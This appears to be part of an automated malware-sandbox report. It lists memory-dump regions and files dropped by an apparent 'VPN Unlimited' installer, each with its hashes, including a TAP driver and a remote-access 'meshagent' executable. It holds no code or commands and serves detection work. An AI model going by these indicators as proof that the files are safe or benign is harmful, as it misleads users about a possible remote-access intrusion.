memory/2164-492-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2164-491-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2164-490-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2164-493-0x0000000140000000-0x000000014000E000-memory.dmp
memory/5020-498-0x0000000140000000-0x0000000140835000-memory.dmp
memory/5020-501-0x0000000140000000-0x0000000140835000-memory.dmp
memory/2164-500-0x0000000140000000-0x000000014000E000-memory.dmp
memory/5020-499-0x0000000140000000-0x0000000140835000-memory.dmp
memory/5020-503-0x0000000140000000-0x0000000140835000-memory.dmp
memory/5020-502-0x0000000140000000-0x0000000140835000-memory.dmp
memory/1476-530-0x0000000002BF0000-0x0000000002C26000-memory.dmp
memory/1476-533-0x0000000005720000-0x0000000005D4A000-memory.dmp
memory/2316-556-0x0000000005EE0000-0x0000000005F02000-memory.dmp
memory/1476-557-0x0000000005E20000-0x0000000005E86000-memory.dmp
memory/1476-558-0x0000000005E90000-0x0000000005EF6000-memory.dmp
memory/2316-562-0x0000000006180000-0x00000000064D7000-memory.dmp
memory/2316-588-0x0000000006560000-0x000000000657E000-memory.dmp
memory/2316-589-0x0000000006600000-0x000000000664C000-memory.dmp
memory/2316-612-0x00000000075A0000-0x00000000075BA000-memory.dmp
memory/2316-611-0x0000000007BF0000-0x000000000826A000-memory.dmp
memory/1476-635-0x0000000007770000-0x000000000778E000-memory.dmp
memory/1476-626-0x000000006DEA0000-0x000000006DEEC000-memory.dmp
memory/1476-624-0x0000000007790000-0x00000000077C4000-memory.dmp
memory/1476-636-0x00000000077E0000-0x0000000007884000-memory.dmp
memory/1476-639-0x0000000007900000-0x000000000790A000-memory.dmp
memory/1476-643-0x00000000079D0000-0x0000000007A66000-memory.dmp
memory/1476-648-0x0000000007940000-0x0000000007951000-memory.dmp
memory/1476-655-0x0000000007970000-0x000000000797E000-memory.dmp
memory/1476-659-0x0000000007980000-0x0000000007995000-memory.dmp
memory/1476-661-0x0000000007A70000-0x0000000007A8A000-memory.dmp
memory/1476-675-0x00000000079B0000-0x00000000079B8000-memory.dmp
memory/4676-1188-0x00000271725C0000-0x00000271725EA000-memory.dmp
memory/3884-1192-0x0000000000440000-0x0000000000734000-memory.dmp
memory/3884-1193-0x00000000050F0000-0x000000000518C000-memory.dmp
memory/3836-1465-0x000000006DEA0000-0x000000006DEEC000-memory.dmp
memory/3836-1474-0x0000000007560000-0x0000000007604000-memory.dmp
memory/3836-1543-0x00000000076B0000-0x00000000076C1000-memory.dmp
memory/3836-1736-0x0000000007700000-0x0000000007715000-memory.dmp
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
| MD5 | 8f6bdd924c4d71face7dfc18d8be238d |
| SHA1 | 6857920fec8ecc23598ccf32e771ab1de54d42d1 |
| SHA256 | a3253d12ea807240cbb41a7d6e5d97d1e29a01d695a81dba6c1278e95a84652f |
| SHA512 | fa42b996be7deb1dbaa304df81f30264f00b886d4dc2ed44dc5467f8f7d6badd72fcd5cfc3f5add4e377f4e9376bca3295e6a08f9fb02eb66376100e67353594 |
C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.ba\logo.png
| MD5 | d6bd210f227442b3362493d046cea233 |
| SHA1 | ff286ac8370fc655aea0ef35e9cf0bfcb6d698de |
| SHA256 | 335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef |
| SHA512 | 464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b |
C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe
| MD5 | 35e545dac78234e4040a99cbb53000ac |
| SHA1 | ae674cc167601bd94e12d7ae190156e2c8913dc5 |
| SHA256 | 9a6c005e1a71e11617f87ede695af32baac8a2056f11031941df18b23c4eeba6 |
| SHA512 | bd984c20f59674d1c54ca19785f54f937f89661014573c5966e5f196f776ae38f1fc9a7f3b68c5bc9bf0784adc5c381f8083f2aecdef620965aeda9ecba504f3 |
C:\Windows\Installer\e5895c5.msi
| MD5 | a4075b745d8e506c48581c4a99ec78aa |
| SHA1 | 389e8b1dbeebdff749834b63ae06644c30feac84 |
| SHA256 | ee130110a29393dcbc7be1f26106d68b629afd2544b91e6caf3a50069a979b93 |
| SHA512 | 0b980f397972bfc55e30c06e6e98e07b474e963832b76cdb48717e6772d0348f99c79d91ea0b4944fe0181ad5d6701d9527e2ee62c14123f1f232c1da977cada |
C:\Config.Msi\e5895c4.rbs
| MD5 | 3afd71e1c95ecf665cb6e1db62fce299 |
| SHA1 | 1ac0bf74042f010d5e25514b46077361bcf3edda |
| SHA256 | b2cbc49750c52fbc1b39b1c4a90bbc6d8b04b75d1d33b95cc2d8cab965565804 |
| SHA512 | 34307962f3194770be00594d1941dc9cc766987e27c45861d4337cdff705ac67ef7f1580a829da19c4f05c396737908b8b83b10ed7edcd519ff717b7fc0ee57d |
C:\Config.Msi\e5895b8.rbs
| MD5 | 2124d8804e4f50ceb49f8b9a6b7b3587 |
| SHA1 | 6dc6a368ae765ba01eb1d0e95b54ba5fa5f294ed |
| SHA256 | 88b44a4bdb051186b00084ea8ff54fbb57d49d88967415750fe6d0dbfed69149 |
| SHA512 | 62d2fb797a58a57fc66e6d813d35a4e894baa0b1019c63eda463b11491a01b16bc2a9a25f431a320a88959c3df0d8bda90dbd86c47d36969f11b5e1f76c0aff7 |
C:\Config.Msi\e5895cb.rbs
| MD5 | bf9b6ffe22e20c66bcba56ab6095a9c6 |
| SHA1 | 85b871d942ed51abc4cd8ed419f0e29a1bed639e |
| SHA256 | a336c817b62d8076f3853f02bbe26f7dde7479a514d62c5b94978331b070f206 |
| SHA512 | d93298ba5bf08c4be11db49935d2552de4abca1bb6e818ddba0f5dc8757408b700eda1505c529b3a6b249bce89bf3215a689aa5eeaa8757d2de3d64c3a56553b |
C:\Config.Msi\e5895da.rbs
| MD5 | 1473aa71e48cf5e3b61c089e6b6bc791 |
| SHA1 | 794183460fb158db15ae0a9ffea737843e63483d |
| SHA256 | 04e0f9b80efb7c5d5e30f52e0ed6c467bac0c20cf820448a5553a1b4b5e6424d |
| SHA512 | 3d61647a0d00a064fa58dc16514ed98e8168ab390ebd57c7a0837070b7a3ebc9338e43cf6b07190596b8a1eda5cf9a4ecf1e07a30e883eef2fd16d864a21d862 |
C:\Windows\Temp\{24FD707A-5F42-4294-A38E-0D7DF27BADB0}\.ba\wixstdba.dll
| MD5 | eab9caf4277829abdf6223ec1efa0edd |
| SHA1 | 74862ecf349a9bedd32699f2a7a4e00b4727543d |
| SHA256 | a4efbdb2ce55788ffe92a244cb775efd475526ef5b61ad78de2bcdfaddac7041 |
| SHA512 | 45b15ade68e0a90ea7300aeb6dca9bc9e347a63dba5ce72a635957564d1bdf0b1584a5e34191916498850fc7b3b7ecfbcbfcb246b39dbf59d47f66bc825c6fd2 |
C:\Users\Admin\AppData\Local\Temp\{f6eb349c-baf2-f946-9412-d0c56a14859e}\tap0901.sys
| MD5 | c10ccdec5d7af458e726a51bb3cdc732 |
| SHA1 | 0553aab8c2106abb4120353360d747b0a2b4c94f |
| SHA256 | 589c5667b1602837205da8ea8e92fe13f8c36048b293df931c99b39641052253 |
| SHA512 | 7437c12ae5b31e389de3053a55996e7a0d30689c6e0d10bde28f1fbf55cee42e65aa441b7b82448334e725c0899384dee2645ce5c311f3a3cfc68e42ad046981 |
C:\Users\Admin\AppData\Local\Temp\{f6eb349c-baf2-f946-9412-d0c56a14859e}\tap0901.cat
| MD5 | f73ac62e8df97faf3fc8d83e7f71bf3f |
| SHA1 | 619a6e8f7a9803a4c71f73060649903606beaf4e |
| SHA256 | cc74cdb88c198eb00aef4caa20bf1fda9256917713a916e6b94435cd4dcb7f7b |
| SHA512 | f81f5757e0e449ad66a632299bcbe268ed02df61333a304dccafb76b2ad26baf1a09e7f837762ee4780afb47d90a09bf07cb5b8b519c6fb231b54fa4fbe17ffe |
C:\Users\Admin\AppData\Local\Temp\{f6eb349c-baf2-f946-9412-d0c56a14859e}\oemvista.inf
| MD5 | 26009f092ba352c1a64322268b47e0e3 |
| SHA1 | e1b2220cd8dcaef6f7411a527705bd90a5922099 |
| SHA256 | 150ef8eb07532146f833dc020c02238161043260b8a565c3cfcb2365bad980d9 |
| SHA512 | c18111982ca233a7fc5d1e893f9bd8a3ed739756a47651e0638debb0704066af6b25942c7961cdeedf953a206eb159fe50e0e10055c40b68eb0d22f6064bb363 |
memory/2316-3367-0x0000000007B90000-0x0000000007BB2000-memory.dmp
memory/2316-3376-0x0000000008960000-0x0000000008F06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe
| MD5 | 546157d9f4974c5b9871be88d6814a3e |
| SHA1 | 8fa936396bca1454aa4bb8f8767394ca25763383 |
| SHA256 | c9fb879ceee5d354d2f773a565f7a537cb71733ea79dce8763a819774c64304c |
| SHA512 | 8369d845ecd5670abc2d257e9a794bf59c771f1496b8ae6a74d0987c25152483cf0ca15710bbf087c6aa816700b6a8774e4dd7744b91256e2f54094b65271117 |
C:\Windows\SystemTemp\UDDB301.tmp
| MD5 | 16098bfa3cc9dcb626d6ef93e682d524 |
| SHA1 | 8e49f6c59a2194a578547f2c395ce5f6c2e88ab0 |
| SHA256 | 7ef7c1e13a674b8b12177302947bf9682939806877fbbe9c135bc5e99f2e0f0f |
| SHA512 | ec90f56742f7c0154afe67faeff2606e53bbb605a333ee9dbe93ffbe8cd39da8e6922eadd2896df48db91a39cd8628425b3353efa7a8c95c10c606eb1ea3a6c3 |
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E28096A490EA08F97F0BFE5FCD4C8CA517F4C5BF
| MD5 | fdd32945cb285034edd82e0c4734edf1 |
| SHA1 | c86044455c193e368a1b16f0095a5c6620c5a91b |
| SHA256 | 9e039f790660660aeb655e0531e333f34e0daff9c98240e6799a62c76d11c883 |
| SHA512 | 4d5879bc8312f51d7a19e8d0a884686d15d4cc54532ef1ffa1e8a82734519ceedd7134f92fb158f5f4c8e47d210e804df14d23a8b792e75f7a59b3568a37d196 |
memory/3884-3861-0x0000000005630000-0x00000000057C0000-memory.dmp
memory/3884-3886-0x0000000004F20000-0x0000000004F42000-memory.dmp